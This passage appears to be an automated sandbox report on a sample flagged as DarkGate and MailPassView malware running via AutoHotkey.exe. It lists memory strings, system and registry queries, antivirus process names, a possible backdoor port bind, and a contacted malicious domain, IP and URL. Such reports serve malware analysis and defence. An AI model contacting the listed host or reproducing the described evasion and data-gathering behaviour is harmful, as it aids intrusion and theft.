Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr Binary or memory string: 5A`7ATextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAllClipboard...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264MasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWMonitorCountMonitorPrimaryMonitorMonitorWorkAreaMonitorNameAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightShowAddRenameCheckUncheckToggleCheckEnableDisableToggleEnableStandardNoStandardColorNoDefaultDeleteAllTipIconNoIconMainWindowNoMainWindowSubmitCancelHideMinimizeMaximizeRestoreDestroyMarginFontListViewTreeViewFlashNewMoveMoveDrawFocusChooseChooseStringPosFocusVEnabledVisibleHwndNameButtonCheckboxRadioDDLDropDownListComboBoxListBoxUpDownSliderTab2Tab3GroupBoxPicPictureDateTimeMonthCalStatusBarActiveXLinkCustomPriorityInterruptNoTimersCloseWaitCloseStyleExStyleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceListLineCountCurrentLineCurrentColSelectedEjectLockUnlockLabelFileSystemFSSetLabel:SerialTypeS
Source: AutoHotkey.exe Binary or memory string: Program Manager
Source: AutoHotkey.exe Binary or memory string: Shell_TrayWnd
Source: AutoHotkey.exe.0.dr Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Contains functionality to query locales information (e.g. system language)
Source: C:\NwiQ\AutoHotkey.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_04846735
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA,GetACP, 1_2_0484D6F5
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA, 1_2_0484C08D
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA, 1_2_04847089
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA, 1_2_0484C0D9
Source: C:\NwiQ\AutoHotkey.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_0484683F
Queries information about the installed CPU (vendor, model number etc)
Source: C:\NwiQ\AutoHotkey.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\NwiQ\AutoHotkey.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041EF50 GetFileAttributesW,SetCurrentDirectoryW,GetSystemTimeAsFileTime, 1_2_0041EF50
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044F450 GetComputerNameW,GetUserNameW, 1_2_0044F450
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041A00E RtlGetVersion,__snwprintf, 1_2_0041A00E
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: superantispyware.exe

Stealing of Sensitive Information
barindex
Yara detected DarkGate
Source: Yara match File source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: AutoHotkey.exe Binary or memory string: WIN_XP
Source: AutoHotkey.exe.0.dr Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingleWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkCountarraypcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCallbackCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapi
Source: AutoHotkey.exe Binary or memory string: WIN_VISTA
Source: AutoHotkey.exe Binary or memory string: WIN_7
Source: AutoHotkey.exe Binary or memory string: WIN_8
Source: AutoHotkey.exe Binary or memory string: WIN_8.1

Remote Access Functionality
barindex
Yara detected DarkGate
Source: Yara match File source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041E430 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain, 1_2_0041E430
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041D9D0 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,DestroyWindow,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,_free,_free,_free, 1_2_0041D9D0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485CA8D bind, 1_2_0485CA8D
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
205.234.201.153
 backupssupport.com United States
23352 SERVERCENTRALUS true

Contacted Domains

Name IP Active
backupssupport.com 205.234.201.153 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://backupssupport.com/fykbmgsz true unknown